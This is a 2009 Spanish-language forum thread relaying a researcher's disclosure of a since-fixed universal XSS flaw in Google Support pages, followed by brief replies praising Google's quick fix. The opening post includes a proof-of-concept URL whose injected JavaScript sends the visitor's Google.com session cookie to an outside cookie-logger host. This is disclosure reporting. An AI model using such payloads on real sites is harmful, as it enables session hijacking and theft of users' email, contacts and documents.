elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Vulnerabilidad XSS Universal en todos los Servicios Google ...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Vulnerabilidad XSS Universal en todos los Servicios Google ...  (Leído 2,526 veces)
Novlucker
Ninja y
Moderador Global
***
Desconectado Desconectado

Mensajes: 10.693

Yo que tu lo pienso dos veces


Ver Perfil
Vulnerabilidad XSS Universal en todos los Servicios Google ...
« en: 11 Mayo 2009, 15:57 »

Vulnerabilidad XSS Universal en todos los Servicios Google puede comprometer su información personal

Vulnerabilidad Reportada: 18-Abril-2009 9.33 pm
Respuesta de Google: 18-Abril-2009 10.19 pm (Wow! eso es súper rápido para un sábado :))
Vulnerabilidad Reparada: 05-Mayo-2009 7.05 pm
Cambio Propagado: 07-Mayo-2009 3.19 pm

Recientemente informé de una falla cross-scripting (XSS) a Google, que ahora ya está arreglada. La vulnerabilidad existía en el Script Python del Soporte de Google en donde una URL maliciosa no era depurada del caracter XSS ' (comilla simple) antes de ponerlo dentro de la variable logURL de javascript. Como resultado, era posible romper el encapsulamiento de la declaración var y ejecutar comandos javascript arbitrarios en el dominio principal Google.com.

La única limitación eran los siguientes caractéres que eran o bien filtrados o codificados para url - " (comillas dobles) < > (espacio) { }. Sin embargo, esta protección podía ser sorteada fácilmente. Puede escribir un comando javascript para robar cookies de sesión [gracias a que caractéres como ' ; . ( ) / = +aún estaban disponibles] y enviarlos a mi sitio malicioso. Vea el ejemplo que se da abajo.

Su cookie del dominio Google.com es el cookie central de autenticación única (SSO) para todos los servicios google. Una vez que alguien cualquiera lo obtenga, él o ella pueden usarlo para

1. Robarle sus emails.
2. Robarle sus contactos.
3. Robarle sus documentos.
4. Robarle sus código.
5. Robarle sus sitios.
6. Robarle sus website analytics.
7. Poner una entrada trasera en su página de inicio de iGoogle con gadgets maliciosos.
…. y deben haber aun varias cosas más que quedan con las que podrían jugar.

Un código de una sencilla Prueba de Concepto puede mostrar su cookie de Google.com en un cuadro de alerta:

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g

Un ejemplo más de la vida real donde un atacante silenciosamente transfiere su cookie Google.com a su sitio maligno:-

http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index

Quiero agradecer al equipo de Seguridad de Google por sus rápidas respuestas y arreglo a este serio problema en tiempo y forma. Si piensa que Google se tomó mucho tiempo para arreglar esta vulnerabilidad, piénselo de nuevo. Este script de python es usado en muchos lugares. Intente esta soncera en Google para ver el uso de este script en casi todos los Servicios Google.

Fuente:http://securethoughts.com/2009/05/universal-xss-vulnerability-in-all-google-services-can-compromise-your-personal-information/
Traducción para Segu-info:http://blog.segu-info.com.ar/2009/05/vulnerabilidad-xss-universal-en-todos.html
« Última modificación: 11 Mayo 2009, 16:07 por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Littlehorse
All the world's a stage
Colaborador
***
Desconectado Desconectado

Mensajes: 2.714


Nie Dam Sie


Ver Perfil WWW
Re: Vulnerabilidad XSS Universal en todos los Servicios Google puede comprometer su información pers
« Respuesta #1 en: 11 Mayo 2009, 16:05 »

El tiempo de respuesta es simplemente sorprendente, como se notan los recursos con los que cuenta Google cuando se trata de seguridad. Excelente noticia y felicitaciones a Inferno.
En línea

An expert is a man who has made all the mistakes which can be made, in a very narrow field.
braulio--
Wiki

Desconectado Desconectado

Mensajes: 896


Imagen recursiva


Ver Perfil WWW
Re: Vulnerabilidad XSS Universal en todos los Servicios Google ...
« Respuesta #2 en: 12 Mayo 2009, 16:06 »

Es increible, crei que tardaria en ver una vulnerabilidad xss en google.
En línea

Artikbot
Holy Thunderforce
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.571


@ehn Division


Ver Perfil WWW
Re: Vulnerabilidad XSS Universal en todos los Servicios Google ...
« Respuesta #3 en: 12 Mayo 2009, 19:59 »

Microsoft y Google, los dos gigantes...

La diferencia entre ellos, es que uno le suda tres pueblos, y el otro tiene un interés impresionante en mejorar.


Viva google una vez más ;)
En línea




Monto ordenadores a medida, me ajusto a todo tipo de presupuestos. Contáctame para más información.
Sólo para España peninsular y Baleares
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines